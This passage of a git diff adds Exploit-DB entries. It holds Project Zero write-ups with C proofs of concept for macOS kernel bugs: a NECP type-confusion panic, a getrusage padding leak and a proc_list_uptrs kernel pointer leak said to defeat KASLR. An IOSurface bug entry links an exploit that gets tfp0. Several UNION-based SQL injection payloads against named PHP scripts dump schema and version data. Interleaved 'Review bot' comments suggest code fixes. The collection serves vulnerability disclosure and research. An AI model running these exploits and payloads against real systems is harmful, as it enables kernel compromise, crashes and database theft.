(tif=0x65eb6fc06900, s=) + at tif_jpeg.c:1114 +#3 0x000065eb6f9d4305 in TIFFSeek (sample=0, row=54, tif=0x65eb6fc06900) + at tif_read.c:379 +#4 TIFFReadScanline (tif=0x65eb6fc06900, buf=0xdbd8738ef40, row=54, + sample=) at tif_read.c:446 +#5 0x00000dbd8718c5fc in main (argc=, argv=) + at pal2rgb.c:194 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43322.zip \ No newline at end of file 
diff --git a/exploits/macos/dos/43318.c b/exploits/macos/dos/43318.c
new file mode 100644
index 000000000..63ceffb22
--- /dev/null
+++ b/exploits/macos/dos/43318.c
@@ -0,0 +1,69 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1392&desc=2
+
+When getsockopt() [edited; original report said "setsockopt"] is called on any socket with level SOL_SOCKET and optname SO_NECP_ATTRIBUTES, necp_get_socket_attributes is invoked.
+necp_get_socket_attributes() unconditionally calls sotoinpcb(so):
+
+ errno_t
+ necp_get_socket_attributes(struct socket *so, struct sockopt *sopt)
+ {
+ int error = 0;
+ u_int8_t *buffer = NULL;
+ u_int8_t *cursor = NULL;
+ size_t valsize = 0;
+ struct inpcb *inp = sotoinpcb(so);
+
+ if (inp->inp_necp_attributes.inp_domain != NULL) {
+ valsize += sizeof(struct necp_tlv_header) + strlen(inp->inp_necp_attributes.inp_domain);
+ }
+ [...]
+ }
+
+sotoinpcb() causes type confusion if so->so_pcb is of an unexpected type (because the socket is not an IPv4/IPv6 socket):
+
+ #define sotoinpcb(so) ((struct inpcb *)(so)->so_pcb)
+
+If necp_get_socket_attributes() is called on a UNIX domain socket, this will cause the members of inp->inp_necp_attributes to be read from type-confused, probably also out-of-bounds memory behind the actual so->so_pcb (which is of type `struct unpcb`, which looks much smaller than `struct inpcb`).
+
+
+To trigger this bug, compile the following code, run it, and cause some system activity, e.g. by launching the browser (the PoC won't crash if so->so_pcb contains NULLs in the right spots).
+
+==============
+*/
+
+#include
+#include
+#include
+#include
+#include
+
+#define SO_NECP_ATTRIBUTES 0x1109
+
+int main(void) {
+ while (1) {
+ int s = socket(AF_UNIX, SOCK_STREAM, 0);
+ if (s == -1)
+ err(1, "socket");
+ getsockopt(s, SOL_SOCKET, SO_NECP_ATTRIBUTES, NULL, NULL);
+ close(s);
+ }
+}
+/*
+==============
+
+On macOS 10.13 (17A405), this causes the following crash:
+
+==============
+*** Panic Report ***
+panic(cpu 2 caller 0xffffff800e78a611): Kernel trap at 0xffffff800e976930, type 14=page fault, registers:
+CR0: 0x000000008001003b, CR2: 0x000000fa000000cc, CR3: 0x0000000200037073, CR4: 0x00000000001627e0
+RAX: 0x000000fa000000cc, RBX: 0x000000fa000000cb, RCX: 0xffffff800eb90aad, RDX: 0xffffff800eb90dcc
+RSP: 0xffffff8018de3e70, RBP: 0xffffff8018de3e90, RSI: 0xffffff8018de3ef0, RDI: 0xffffff8032ac66a8
+R8: 0x0000000000000001, R9: 0xffffffff00000000, R10: 0x0000000000000000, R11: 0x0000000000000246
+R12: 0xffffff80357cf7d0, R13: 0xffffff8032d69a08, R14: 0xffffff8018de3ef0, R15: 0xffffff8032ac66a8
+RFL: 0x0000000000010206, RIP: 0xffffff800e976930, CS: 0x0000000000000008, SS: 0x0000000000000010
+Fault CR2: 0x000000fa000000cc, Error code: 0x0000000000000000, Fault CPU: 0x2, PL: 0, VF: 1
+==============
+
+This bug should be usable for disclosing kernel memory.
+*/
\ No newline at end of file
diff --git a/exploits/macos/dos/43319.c b/exploits/macos/dos/43319.c
new file mode 100644
index 000000000..ffe1a7ee0
--- /dev/null
+++ b/exploits/macos/dos/43319.c
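Review bot: `#define SO_NECP_ATTRIBUTES 0x1109` redefines a socket option locally with no note of where the value comes from; a comment such as `/* SOL_SOCKET option handled by necp_get_socket_attributes(); value taken from the report above, presumably not in the public SDK headers */` would spare the next reader a search. The return value of `getsockopt()` on the following line is discarded inside the loop, which is deliberate for a trigger but should say so, e.g. `/* result intentionally ignored: the kernel-side read is the point */`. Since `while (1)` never exits, `int main(void)` has no return path; `for (;;)` plus an unreachable `return 0;` after the loop is the conventional way to keep compilers quiet about it.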
@@ -0,0 +1,201 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1405
+
+For 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:
+
+int
+getrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)
+{
+ struct rusage *rup, rubuf;
+ struct user64_rusage rubuf64;
+ struct user32_rusage rubuf32;
+ size_t retsize = sizeof(rubuf); // default: 32 bits
+ caddr_t retbuf = (caddr_t)&rubuf; // default: 32 bits
+ struct timeval utime;
+ struct timeval stime;
+
+
+ switch (uap->who) {
+ case RUSAGE_SELF:
+ calcru(p, &utime, &stime, NULL);
+ proc_lock(p);
+ rup = &p->p_stats->p_ru;
+ rup->ru_utime = utime;
+ rup->ru_stime = stime;
+
+ rubuf = *rup;
+ proc_unlock(p);
+
+ break;
+ [...]
+ }
+ if (IS_64BIT_PROCESS(p)) {
+ retsize = sizeof(rubuf64);
+ retbuf = (caddr_t)&rubuf64;
+ munge_user64_rusage(&rubuf, &rubuf64);
+ } else {
+ [...]
+ }
+
+ return (copyout(retbuf, uap->rusage, retsize));
+}
+
+`munge_user64_rusage()` performs the conversion by copying individual fields:
+
+__private_extern__ void
+munge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)
+{
+ // timeval changes size, so utime and stime need special handling
+ a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;
+ a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;
+ a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;
+ a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;
+[...]
+}
+
+`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:
+
+#define _STRUCT_USER64_TIMEVAL struct user64_timeval
+_STRUCT_USER64_TIMEVAL
+{
+ user64_time_t tv_sec; // seconds
+ __int32_t tv_usec; // and microseconds
+};
+
+struct user64_rusage {
+ struct user64_timeval ru_utime; // user time used
+ struct user64_timeval ru_stime; // system time used
+ user64_long_t ru_maxrss; // max resident set size
+[...]
+};
+
+This padding is not initialized, but is copied to userspace.
+
+
+The following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.
+
+
+Just leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers.
+The returned data seems to come from the previous syscall:
+
+$ cat test.c
+#include
+#include
+#include
+#include
+#include
+#include
+
+void do_leak(void) {
+ static struct rusage ru;
+ getrusage(RUSAGE_SELF, &ru);
+ static unsigned int leak1, leak2;
+ memcpy(&leak1, ((char*)&ru)+12, 4);
+ memcpy(&leak1, ((char*)&ru)+28, 4);
+ printf("leak1: 0x%08x\n", leak1);
+ printf("leak2: 0x%08x\n", leak2);
+}
+
+int main(void) {
+ do_leak();
+ do_leak();
+ do_leak();
+ int fd = open("/dev/null", O_RDONLY);
+ do_leak();
+ int dummy;
+ read(fd, &dummy, 4);
+ do_leak();
+ return 0;
+}
+$ gcc -o test test.c && ./test
+leak1: 0x00000000
+leak2: 0x00000000
+leak1: 0xffffff80
+leak2: 0x00000000
+leak1: 0xffffff80
+leak2: 0x00000000
+leak1: 0xffffff80
+leak2: 0x00000000
+leak1: 0xffffff81
+leak2: 0x00000000
+
+
+However, I believe that this can also be used to disclose kernel heap memory.
+When the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack
+without zeroing it, so the new stack contains data from previous heap allocations.
+The following testcase, when run after repeatedly reading a wordlist into memory,
+leaks some non-pointer data that seems to come from the wordlist:
+
+$ cat forktest.c
+*/
+
+#include
+#include
+#include
+#include
+#include
+#include
+
+void do_leak(void) {
+ static struct rusage ru;
+ getrusage(RUSAGE_SELF, &ru);
+ static unsigned int leak1, leak2;
+ memcpy(&leak1, ((char*)&ru)+12, 4);
+ memcpy(&leak2, ((char*)&ru)+28, 4);
+ char str[1000];
+ if (leak1 != 0) {
+ sprintf(str, "leak1: 0x%08x\n", leak1);
+ write(1, str, strlen(str));
+ }
+ if (leak2 != 0) {
+ sprintf(str, "leak2: 0x%08x\n", leak2);
+ write(1, str, strlen(str));
+ }
+}
+
+void leak_in_child(void) {
+ int res_pid, res2;
+ asm volatile(
+ "mov $0x02000002, %%rax\n\t"
+ "syscall\n\t"
+ : "=a"(res_pid), "=d"(res2)
+ :
+ : "cc", "memory", "rcx", "r11"
+ );
+ //write(1, "postfork\n", 9);
+ if (res2 == 1) {
+ //write(1, "child\n", 6);
+ do_leak();
+ char dummy;
+ read(0, &dummy, 1);
+ asm volatile(
+ "mov $0x02000001, %rax\n\t"
+ "mov $0, %rdi\n\t"
+ "syscall\n\t"
+ );
+ }
+ //printf("fork=%d:%d\n", res_pid, res2);
+ int wait_res;
+ //wait(&wait_res);
+}
+
+int main(void) {
+ for(int i=0; i<1000; i++) {
+ leak_in_child();
+ }
+}
+/*
+$ gcc -o forktest forktest.c && ./forktest
+leak1: 0x1b3b1320
+leak1: 0x00007f00
+leak1: 0x65686375
+leak1: 0x410a2d63
+leak1: 0x8162ced5
+leak1: 0x65736168
+leak1: 0x0000042b
+
+The leaked values include the strings "uche", "c-\nA" and "hase", which could plausibly come from the wordlist.
+
+
+Apart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.
+*/
\ No newline at end of file
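Review bot: In the first test.c listing both `memcpy` calls write into `leak1`; the second should be `memcpy(&leak2, ((char*)&ru)+28, 4);`, so the constant `leak2: 0x00000000` in the recorded output reflects the typo rather than a clean offset 28 — the forktest.c copy later in the file has the corrected line, and the discrepancy deserves a one-line comment so readers do not draw conclusions from the first run. In forktest.c, `leak_in_child()` never reaps its children (`wait` is commented out and `wait_res` is unused), so up to 1000 zombies accumulate until the parent exits; re-enabling `wait(&wait_res);` would keep the loop bounded. The closing paragraph gives the hardening suggestion (zero freshly allocated kernel stacks) but not the direct fix, which is presumably to zero `rubuf64` before `munge_user64_rusage()` fills it so no stale padding reaches `copyout`; stating that alongside the KMA_ZERO idea would make the defensive takeaway complete.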
diff --git a/exploits/macos/dos/43321.c b/exploits/macos/dos/43321.c
new file mode 100644
index 000000000..437aad013
--- /dev/null
+++ b/exploits/macos/dos/43321.c
@@ -0,0 +1,235 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1372
+
+the kernel libproc API proc_list_uptrs has the following comment in it's userspace header:
+
+/*
+ * Enumerate potential userspace pointers embedded in kernel data structures.
+ * Currently inspects kqueues only.
+ *
+ * NOTE: returned "pointers" are opaque user-supplied values and thus not
+ * guaranteed to address valid objects or be pointers at all.
+ *
+ * Returns the number of pointers found (which may exceed buffersize), or -1 on
+ * failure and errno set appropriately.
+
+
+This is a recent addition to the kernel, presumably as a debugging tool to help enumerate
+places where the kernel is accidentally disclosing kernel pointers to userspace.
+
+The implementation currently enumerates kqueues and dumps a bunch of values from them.
+
+Here's the relevant code:
+
+// buffer and buffersize are attacker controlled
+
+int
+proc_pidlistuptrs(proc_t p, user_addr_t buffer, uint32_t buffersize, int32_t *retval)
+{
+ uint32_t count = 0;
+ int error = 0;
+ void *kbuf = NULL;
+ int32_t nuptrs = 0;
+
+ if (buffer != USER_ADDR_NULL) {
+ count = buffersize / sizeof(uint64_t); <---(a)
+ if (count > MAX_UPTRS) {
+ count = MAX_UPTRS;
+ buffersize = count * sizeof(uint64_t);
+ }
+ if (count > 0) {
+ kbuf = kalloc(buffersize); <--- (b)
+ assert(kbuf != NULL);
+ }
+ } else {
+ buffersize = 0;
+ }
+
+ nuptrs = kevent_proc_copy_uptrs(p, kbuf, buffersize);
+
+ if (kbuf) {
+ size_t copysize;
+ if (os_mul_overflow(nuptrs, sizeof(uint64_t), ©size)) { <--- (c)
+ error = ERANGE;
+ goto out;
+ }
+ if (copysize > buffersize) { <-- (d)
+ copysize = buffersize;
+ }
+ error = copyout(kbuf, buffer, copysize); <--- (e)
+ }
+
+
+At (a) the attacker-supplied buffersize is divided by 8 to compute the maximum number of uint64_t's
+which can fit in there.
+
+If that value isn't huge then the attacker-supplied buffersize is used to kalloc the kbuf buffer at (b).
+
+kbuf and buffersize are then passed to kevent_proc_copy_uptrs. Looking at the implementation of
+kevent_proc_copy_uptrs the return value is the total number of values it found, even if that value is larger
+than the supplied buffer. If it finds more than will fit it keeps counting but no longer writes them to the kbuf.
+
+This means that at (c) the computed copysize value doesn't reflect how many values were actually written to kbuf
+but how many *could* have been written had the buffer been big enough.
+
+If there were possible values which could have been written than there was space in the buffer then at (d) copysize
+will be limited down to buffersize.
+
+Copysize is then used at (e) to copy the contents of kbuf to userspace.
+
+The bug is that there's no enforcement that (buffersize % 8) == 0. If we were to pass a buffersize of 15, at (a) count would be 1
+as 15 bytes is only enough to store 1 complete uint64_t. At (b) this would kalloc a buffer of 15 bytes.
+
+If the target pid actually had 10 possible values which kevent_proc_copy_uptrs finds then nuptrs will return 10 but it will
+only write to the first value to kbuf, leaving the last 7 bytes untouched.
+
+At (c) copysize will be computed at 10*8 = 80 bytes, at (d) since 80 > 15 copysize will be truncated back down to buffersize (15)
+and at (e) 15 bytes will be copied back to userspace even though only 8 were written to.
+
+Kalloc doesn't zero-initialise returned memory so this can be used to easily and safely disclose lots of kernel memory, albeit
+limited to the 7-least significant bytes of each 8-byte aligned qword. That's more than enough to easily defeat kaslr.
+
+This PoC demonstrates the disclosure of kernel pointers in the stale kalloc memory.
+
+Tested on MacOS 10.13 High Sierra (17A365)
+*/
+
+// ianbeer
+
+#if 0
+XNU kernel memory disclosure due to bug in kernel API for detecting kernel memory disclosures
+
+the kernel libproc API proc_list_uptrs has the following comment in it's userspace header:
+
+/*
+ * Enumerate potential userspace pointers embedded in kernel data structures.
+ * Currently inspects kqueues only.
+ *
+ * NOTE: returned "pointers" are opaque user-supplied values and thus not
+ * guaranteed to address valid objects or be pointers at all.
+ *
+ * Returns the number of pointers found (which may exceed buffersize), or -1 on
+ * failure and errno set appropriately.
+ */
+
+This is a recent addition to the kernel, presumably as a debugging tool to help enumerate
+places where the kernel is accidentally disclosing kernel pointers to userspace.
+
+The implementation currently enumerates kqueues and dumps a bunch of values from them.
+
+Here's the relevant code:
+
+// buffer and buffersize are attacker controlled
+
+int
+proc_pidlistuptrs(proc_t p, user_addr_t buffer, uint32_t buffersize, int32_t *retval)
+{
+ uint32_t count = 0;
+ int error = 0;
+ void *kbuf = NULL;
+ int32_t nuptrs = 0;
+
+ if (buffer != USER_ADDR_NULL) {
+ count = buffersize / sizeof(uint64_t); <---(a)
+ if (count > MAX_UPTRS) {
+ count = MAX_UPTRS;
+ buffersize = count * sizeof(uint64_t);
+ }
+ if (count > 0) {
+ kbuf = kalloc(buffersize); <--- (b)
+ assert(kbuf != NULL);
+ }
+ } else {
+ buffersize = 0;
+ }
+
+ nuptrs = kevent_proc_copy_uptrs(p, kbuf, buffersize);
+
+ if (kbuf) {
+ size_t copysize;
+ if (os_mul_overflow(nuptrs, sizeof(uint64_t), ©size)) { <--- (c)
+ error = ERANGE;
+ goto out;
+ }
+ if (copysize > buffersize) { <-- (d)
+ copysize = buffersize;
+ }
+ error = copyout(kbuf, buffer, copysize); <--- (e)
+ }
+
+
+At (a) the attacker-supplied buffersize is divided by 8 to compute the maximum number of uint64_t's
+which can fit in there.
+
+If that value isn't huge then the attacker-supplied buffersize is used to kalloc the kbuf buffer at (b).
+
+kbuf and buffersize are then passed to kevent_proc_copy_uptrs. Looking at the implementation of
+kevent_proc_copy_uptrs the return value is the total number of values it found, even if that value is larger
+than the supplied buffer. If it finds more than will fit it keeps counting but no longer writes them to the kbuf.
+
+This means that at (c) the computed copysize value doesn't reflect how many values were actually written to kbuf
+but how many *could* have been written had the buffer been big enough.
+
+If there were possible values which could have been written than there was space in the buffer then at (d) copysize
+will be limited down to buffersize.
+
+Copysize is then used at (e) to copy the contents of kbuf to userspace.
+
+The bug is that there's no enforcement that (buffersize % 8) == 0. If we were to pass a buffersize of 15, at (a) count would be 1
+as 15 bytes is only enough to store 1 complete uint64_t. At (b) this would kalloc a buffer of 15 bytes.
+
+If the target pid actually had 10 possible values which kevent_proc_copy_uptrs finds then nuptrs will return 10 but it will
+only write to the first value to kbuf, leaving the last 7 bytes untouched.
+
+At (c) copysize will be computed at 10*8 = 80 bytes, at (d) since 80 > 15 copysize will be truncated back down to buffersize (15)
+and at (e) 15 bytes will be copied back to userspace even though only 8 were written to.
+
+Kalloc doesn't zero-initialise returned memory so this can be used to easily and safely disclose lots of kernel memory, albeit
+limited to the 7-least significant bytes of each 8-byte aligned qword. That's more than enough to easily defeat kaslr.
+
+This PoC demonstrates the disclosure of kernel pointers in the stale kalloc memory.
+
+Tested on MacOS 10.13 High Sierra (17A365)
+#endif
+
+#include
+#include
+#include
+#include
+
+#define PRIVATE
+#include
+
+uint64_t try_leak(pid_t pid, int count) {
+ size_t buf_size = (count*8)+7;
+ char* buf = calloc(buf_size+1, 1);
+
+ int err = proc_list_uptrs(pid, (void*)buf, buf_size);
+
+ if (err == -1) {
+ return 0;
+ }
+
+ // the last 7 bytes will contain the leaked data:
+ uint64_t last_val = ((uint64_t*)buf)[count]; // we added an extra zero byte in the calloc
+
+ return last_val;
+}
+
+int main(int argc, char** argv) {
+ for (int pid = 0; pid < 1000; pid++) {
+ for (int i = 0; i < 100; i++) {
+ uint64_t leak = try_leak(pid, i);
+ /*
+ if (leak != 0 && leak != 0x00adbeefdeadbeef) {
+ printf("%016llx\n", leak);
+ }
+ */
+ if ((leak & 0x00ffffff00000000) == 0xffff8000000000) {
+ printf("%016llx\n", leak);
+ }
+ }
+ }
+
+ return 0;
+}
\ No newline at end of file
diff --git a/exploits/multiple/dos/43320.txt b/exploits/multiple/dos/43320.txt
new file mode 100644
index 000000000..42f43fb64
--- /dev/null
+++ b/exploits/multiple/dos/43320.txt
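Review bot: `try_leak()` obtains `buf` from `calloc` and returns on both paths without releasing it, so the 1000×100 iterations in `main()` leak every buffer; read `last_val` first and add `free(buf);` before each `return`. `buf_size` is a `size_t` handed to the `uint32_t buffersize` parameter, harmless at these sizes but worth an explicit cast so the narrowing is visible. The analysis text appears twice, once in the leading comment and once inside `#if 0 ... #endif`; keeping a single copy would halve the file without losing anything. The text already names the defensive fix implicitly — `buffersize` is never required to be a multiple of 8 and `copysize` is derived from `nuptrs` rather than from what was actually written — and a sentence in the explanation stating it outright, e.g. "a fix must bound copysize by the number of entries written (MIN(nuptrs, count) * sizeof(uint64_t)) or reject buffersize values that are not a multiple of 8", would help readers auditing similar copyout paths.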
@@ -0,0 +1,36 @@
+I have previously detailed the lifetime management paradigms in MIG in the writeups for:
+ CVE-2016-7612 [https://bugs.chromium.org/p/project-zero/issues/detail?id=926]
+and
+ CVE-2016-7633 [https://bugs.chromium.org/p/project-zero/issues/detail?id=954]
+
+If a MIG method returns KERN_SUCCESS it means that the method took ownership of *all* the arguments passed to it.
+If a MIG method returns an error code, then it took ownership of *none* of the arguments passed to it.
+
+If an IOKit userclient external method takes an async wake mach port argument then the lifetime of the reference
+on that mach port passed to the external method will be managed by MIG semantics. If the external method returns
+an error then MIG will assume that the reference was not consumed by the external method and as such the MIG
+generated coode will drop a reference on the port.
+
+IOSurfaceRootUserClient external method 17 (s_set_surface_notify) will drop a reference on the wake_port
+(via IOUserClient::releaseAsyncReference64) then return an error code if the client has previously registered
+a port with the same callback function.
+
+The external method's error return value propagates via the return value of is_io_connect_async_method back to the
+MIG generated code which will drop a futher reference on the wake_port when only one was taken.
+
+This bug is reachable from the iOS app sandbox as demonstrated by this PoC.
+
+Tested on iOS 11.0.3 (11A432) on iPhone 6s (MKQL2CN/A)
+Tested on MacOS 10.13 (17A365) on MacBookAir5,2
+
+------------------------------------------------------
+
+async_wake exploit attached.
+
+Gets tfp0 on all 64-bit devices plus an initial PoC local kernel debugger.
+
+See the README and kdbg.c for details.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43320.zip
\ No newline at end of file
diff --git a/exploits/php/webapps/43278.txt b/exploits/php/webapps/43278.txt
new file mode 100644
index 000000000..e98f69f23
--- /dev/null
+++ b/exploits/php/webapps/43278.txt
@@ -0,0 +1,46 @@ +# # # # # +# Exploit Title: Entrepreneur Dating Script 2.0.1 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/entrepreneur-dating-script/ +# Demo: http://198.38.86.159/~datingscript/ +# Version: 2.0.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/search_result.php?marital=[SQL]&submit +# +# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93))--+- +# +# +# 2) +# http://localhost/[PATH]/search_result.php?gender=[SQL]&submit +# +# 
-1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93))--+- +# +# +# 3) +# http://localhost/[PATH]/search_result.php?country=[SQL]&submit +# +# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93))--+- +# +# +# 4) +# http://localhost/[PATH]/search_result.php?profileid=[SQL]&submit +# +# 
-1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93))--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43287.txt b/exploits/php/webapps/43287.txt new file mode 100644 index 000000000..849a44143 --- /dev/null +++ b/exploits/php/webapps/43287.txt 
@@ -0,0 +1,34 @@ +# # # # # +# Exploit Title: Secure E-commerce Script 2.0.1 - SQL Injection +# Dork: N/A +# Date: 09.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/secure-e-commerce-script/ +# Version: 2.0.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/category.php?searchmain=[SQL]&searchcat=[SQL] +# http://localhost/[PATH]/single_detail.php?sid=[SQL] +# +# 1'++/*!50000UNION*/+/*!50000SELECT*/+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+- +# +# http://server/category.php?searchmain=1'++/*!50000UNION*/+/*!50000SELECT*/+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+- +# +# Parameter: searchmain (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: searchmain=1' AND 9950=9950 AND 'nOyB'='nOyB&searchcat=a +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43288.txt b/exploits/php/webapps/43288.txt new file mode 100644 index 000000000..a5727d2c6 --- /dev/null +++ b/exploits/php/webapps/43288.txt 
@@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Laundry Booking Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/laundry-booking-script/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/list?city=[SQL]&main_search= +# +# -1'+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53--+-&main_search= +# +# http://server/laundry-search/list?city=-1'+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53--+-&main_search= +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43289.txt b/exploits/php/webapps/43289.txt new file mode 100644 index 000000000..990ab1378 --- /dev/null +++ b/exploits/php/webapps/43289.txt 
@@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: Lawyer Search Script 1.1 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/lawyer-script/ +# Version: 1.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/lawyer-list?city=[SQL]&main_search= +# +# -1'+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+- +# +# http://server/lawyer-list?city=-1'+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search= +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43290.txt b/exploits/php/webapps/43290.txt new file mode 100644 index 000000000..1bea50b61 --- /dev/null +++ b/exploits/php/webapps/43290.txt 
